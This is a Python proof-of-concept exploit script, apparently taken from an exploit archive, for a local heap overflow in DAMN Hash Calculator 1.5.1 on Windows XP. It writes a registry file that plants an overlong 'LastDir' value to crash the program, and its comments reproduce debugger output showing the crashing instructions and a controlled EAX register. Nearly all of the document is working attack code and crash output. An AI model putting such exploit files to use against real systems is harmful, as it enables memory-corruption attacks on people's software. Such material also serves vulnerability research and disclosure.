54 lines
No EOL
1.7 KiB
Python
Executable file
54 lines
No EOL
1.7 KiB
Python
Executable file
#!/usr/bin/python
|
|
|
|
# Exploit Title: DAMN Hash Calculator v1.5.1 Local Heap Overflow PoC
|
|
# Version: 1.5.1
|
|
# Date: 2012-02-21
|
|
# Author: Julien Ahrens
|
|
# Homepage: http://www.inshell.net
|
|
# Software Link: http://www.google.com
|
|
# Tested on: Windows XP SP3 Professional German
|
|
# Notes: Old but nice software...just to proof it's there :-)
|
|
# Howto: Import Reg -> Start App -> Select File -> Cancel without choosing one
|
|
|
|
#7C9204E6 . 8B7D 08 MOV EDI,DWORD PTR SS:[EBP+8]
|
|
#7C9204E9 . 0B47 10 OR EAX,DWORD PTR DS:[EDI+10]
|
|
#7C9204EC . A9 00000269 TEST EAX,69020000
|
|
#7C9204F1 . 0F85 8BA70300 JNZ ntdll.7C95AC82
|
|
#7C9204F7 > 8B45 10 MOV EAX,DWORD PTR SS:[EBP+10]
|
|
#7C9204FA . 8A48 FD MOV CL,BYTE PTR DS:[EAX-3] <-- Crash
|
|
#7C9204FD . 83C0 F8 ADD EAX,-8
|
|
#7C920500 . F6C1 01 TEST CL,1
|
|
#7C920503 . 56 PUSH ESI
|
|
#7C920504 . 0F84 92A70300 JE ntdll.7C95AC9C
|
|
#7C92050A . F6C1 08 TEST CL,8
|
|
#7C92050D . 0F85 B3A70300 JNZ ntdll.7C95ACC6
|
|
|
|
#EAX 42424245
|
|
#ECX 00000008
|
|
#EDX 77C31AE8 msvcrt.77C31AE8
|
|
#EBX 0040F2F0 DAMN_Has.0040F2F0
|
|
#ESP 0012F54C
|
|
#EBP 0012F550
|
|
#ESI 0041A2DC ASCII "EBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC"
|
|
#EDI 00330000
|
|
#EIP 7C9204FA ntdll.7C9204FA
|
|
|
|
|
|
file="poc.reg"
|
|
|
|
junk1="\x41" * 392
|
|
boom="\x45\x42\x42\x42"
|
|
junk2="\x43" * 50
|
|
|
|
poc="Windows Registry Editor Version 5.00\n\n"
|
|
poc=poc + "[HKEY_CURRENT_USER\Software\DAMN\Hash Calculator\Settings]\n"
|
|
poc=poc + "\"LastDir\"=\"" + junk1 + boom + junk2 + "\""
|
|
|
|
try:
|
|
print "[*] Creating exploit file...\n";
|
|
writeFile = open (file, "w")
|
|
writeFile.write( poc )
|
|
writeFile.close()
|
|
print "[*] File successfully created!";
|
|
except:
|
|
print "[!] Error while creating file!"; |